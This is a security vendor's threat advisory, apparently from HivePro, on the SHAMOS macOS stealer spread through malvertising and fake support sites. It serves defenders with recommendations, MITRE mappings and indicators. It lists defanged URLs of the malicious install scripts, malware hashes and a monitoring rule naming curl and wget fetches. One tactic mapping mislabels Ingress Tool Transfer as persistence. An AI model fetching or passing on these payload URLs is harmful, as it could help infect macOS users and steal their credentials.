Threat Advisories:
New SHAMOS Stealer Exploits One-Line Commands on macOS QuirkyLoader: A Silent Enabler of Modern Malware Families CVE-2025-43300: Zero-Day in Apple Image I/O Exploited in Targeted Attacks Static Tundra Fuels Espionage Campaigns Through an Old Cisco Bug Crypto24 Ransomware Disrupts Businesses Using Custom EDR Bypass GodRAT Reloaded: Legacy Code, Modern Tactics Noodlophile Stealer Advances with Obfuscation, Social Media Deception PS1Bot: The Modular Malware Lurking Behind Malvertising Microsoft’s August 2025 Patch Tuesday Roundup Charon Ransomware Encrypts Files Belonging to Middle East Industries CVE-2025-25256: Fortinet Rushes to Patch High-Risk FortiSIEM Vulnerability Efimer Trojan: From Fake Lawsuits to Crypto Heists Zero-Day in WinRAR Actively Weaponized by Multiple Threat Groups DarkCloud Uses Fileless Techniques Turning into a Nightmare for Windows CastleBot Rising: The Evolving Malware-as-a-Service Threat MedusaLocker Uses ThrottleStop.sys Flaw to Kill AV on Windows Malicious npm Packages Target WhatsApp Developers with Kill Switch Trend Micro Warns of Active Exploits in Apex One Console SafePay Ransomware’s Rapid Ascent to the Top of the Cybercrime Scene Adobe Patches Three Critical Flaws in AEM Forms on JEE
🎧 Podcast: This Month's Threats in 10 Min! Emerging Threat Intel Audio Briefing - Listen & Defend Now →
👥 Play Count: Loading...
Partner Program
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure PlatformUni5 Xposure leverages exposure assessment and adversarial exposure validation to deliver a unified view of your cyber risks and all actionable pathways to resolve them.
IntegrationsSync with an abundant number of out-of-the-box integrations.
HiveForce LabsStrategic intelligence and operational expertise to ensure comprehensive security readiness at all levels.
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Case Studies
Whitepapers
Press Releases
connect
Webinars & Videos
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoThreat Digest - Subscribe
Platform
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure PlatformUni5 Xposure leverages exposure assessment and adversarial exposure validation to deliver a unified view of your cyber risks and all actionable pathways to resolve them.
IntegrationsSync with an abundant number of out-of-the-box integrations.
HiveForce LabsStrategic intelligence and operational expertise to ensure comprehensive security readiness at all levels.
Solutions
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Case Studies
Whitepapers
Press Releases
connect
Webinars & Videos
Company
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoThreat Digest - Subscribe

New SHAMOS Stealer Exploits One-Line Commands on macOS

Amber | Attack Report
Download PDF

New SHAMOS Stealer Exploits One-Line Commands on macOS

Summary

A new cyber attack campaign targeting macOS users has emerged, leveraging SHAMOS, a variant of the Atomic macOS Stealer (AMOS). The threat actor Cookie Spider has been actively exploiting victims worldwide (except Russia) since June 2025. Using malvertising and fake support websites, users were tricked into executing one-line terminal commands that secretly downloaded SHAMOS. The malware bypassed Apple Gatekeeper, evaded detection, and exfiltrated sensitive data including credentials, Keychain entries, browser cookies, and cryptocurrency wallets. In certain cases, SHAMOS also installed additional payloads disguised as legitimate apps, highlighting the growing sophistication of macOS-targeted threats.

Attack Details

Between June and August 2025, Cookie Spider deployed SHAMOS through fraudulent troubleshooting sites. Victims searching for macOS help were redirected to fake support portals prompting them to run suspicious terminal one-liners.

Once installed, SHAMOS executed advanced evasion tactics:

  • Anti-VM checks to avoid sandboxes

  • Removal of Apple Gatekeeper attributes

  • Use of AppleScript for host reconnaissance

Its data theft operations focused on:

  • Browser and Keychain credentials

  • Notes and crypto wallets

  • Exfiltration via remote servers

Additionally, SHAMOS sometimes delivered secondary payloads disguised as trusted apps like Ledger Live.

The campaign’s global scale spanned the U.S., UK, Japan, China, Colombia, Canada, Mexico, and Italy. This reflects a scalable delivery model, proving that macOS users remain prime targets for credential theft and financial fraud.

Recommendations

To mitigate SHAMOS infections and strengthen macOS defenses:

  • Educate Users on Malvertising: Train employees to avoid suspicious ads, fake support pages, and one-liner terminal prompts.

  • Restrict Unsigned Scripts: Block or monitor scripts fetched with curl, wget, or obfuscated commands like Base64.

  • Strengthen Endpoint Monitoring: Detect behaviors linked to info-stealers such as unusual xattr use, unexpected AppleScript execution, or repeated Keychain access.

  • Monitor Data Exfiltration: Watch for abnormal traffic like repeated curl uploads or archive transfers to suspicious domains.

  • Enforce Least Privilege: Limit unnecessary admin rights to reduce persistence and malware installation impact.

Indicators of Compromise (IoCs)

SHA256 Hashes:

  • 231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbf547f

  • eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68

  • 4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f

  • b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5

  • a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322

  • 95b97a5da68fcb73c98cd9311c56747545db5260122ddf6fae7b152d3d802877

Domains:

  • mac-safer[.]com

  • rescue-mac[.]com

URLs:

  • hxxps[:]//icloudservers[.]com/gm/install[.]sh

  • hxxps[:]//macostutorial[.]com/iterm2/install[.]sh

  • hxxps[:]//icloudservers[.]com/gm/update

  • hxxps[:]//macostutorial[.]com/iterm2/update

  • hxxps[:]//github[.]com/jeryrymoore/Iterm2

MITRE ATT&CK TTPs

  • Initial Access: TA0001 – Drive-by Compromise (T1189), User Execution (T1204)

  • Execution: TA0002 – AppleScript (T1059.002), Command Interpreter (T1059)

  • Defense Evasion: TA0005 – Obfuscated Files (T1027), Command Obfuscation (T1027.010)

  • Persistence: TA0003 – Ingress Tool Transfer (T1105)

  • Credential Access: TA0006 – Keychain Access (T1555, T1555.001)

  • Collection: TA0009 – Data from Local System (T1005)

  • Exfiltration: TA0010 – Exfiltration Over C2 (T1041)

References

What’s new on HivePro

Get through updates and upcoming events, and more directly in your inbox